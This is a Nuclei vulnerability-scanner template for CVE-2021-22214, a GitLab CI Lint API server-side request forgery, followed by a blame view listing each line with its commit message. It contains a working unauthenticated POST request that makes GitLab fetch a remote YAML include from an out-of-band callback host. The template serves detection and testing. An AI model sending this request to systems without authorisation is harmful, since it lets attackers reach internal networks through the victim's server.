nuclei-templates/cves/2021/CVE-2021-22214.yaml

id: CVE-2021-22214

info:
  author: Suman_Kar
  name: Unauthenticated Gitlab SSRF - CI Lint API
  severity: medium
  description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
    - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
    - https://docs.gitlab.com/ee/api/lint.html
  tags: cve,cve2021,gitlab,ssrf,oob

requests:
  - raw:
      - |
        POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
        Referer: {{BaseURL}}
        content-type: application/json
        Connection: close

        {"content": "include:\n  remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"
misc changes 2021-06-18 09:12:13 +00:00			`id: CVE-2021-22214`
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF 2021-06-17 12:43:03 +00:00
			`info:`
			`author: Suman_Kar`
final improvements 2021-06-18 09:32:17 +00:00			`name: Unauthenticated Gitlab SSRF - CI Lint API`
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF 2021-06-17 12:43:03 +00:00			`severity: medium`
misc changes 2021-06-18 09:12:13 +00:00			`description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-22214`
			`- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html`
			`- https://docs.gitlab.com/ee/api/lint.html`
final improvements 2021-06-18 09:32:17 +00:00			`tags: cve,cve2021,gitlab,ssrf,oob`
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF 2021-06-17 12:43:03 +00:00
			`requests:`
			`- raw:`
			`- \|`
final improvements 2021-06-18 09:32:17 +00:00			`POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1`
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF 2021-06-17 12:43:03 +00:00			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0`
			`Referer: {{BaseURL}}`
			`content-type: application/json`
			`Connection: close`

final improvements 2021-06-18 09:32:17 +00:00			`{"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}`
GitLab CVE 2021-22214 Unauthenticated CI lint API information disclosure and SSRF 2021-06-17 12:43:03 +00:00
			`matchers:`
final improvements 2021-06-18 09:32:17 +00:00			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
Update CVE-2021-22214.yaml dns interaction doesn't prove exploitability 2021-07-07 03:50:13 +00:00			`- "http"`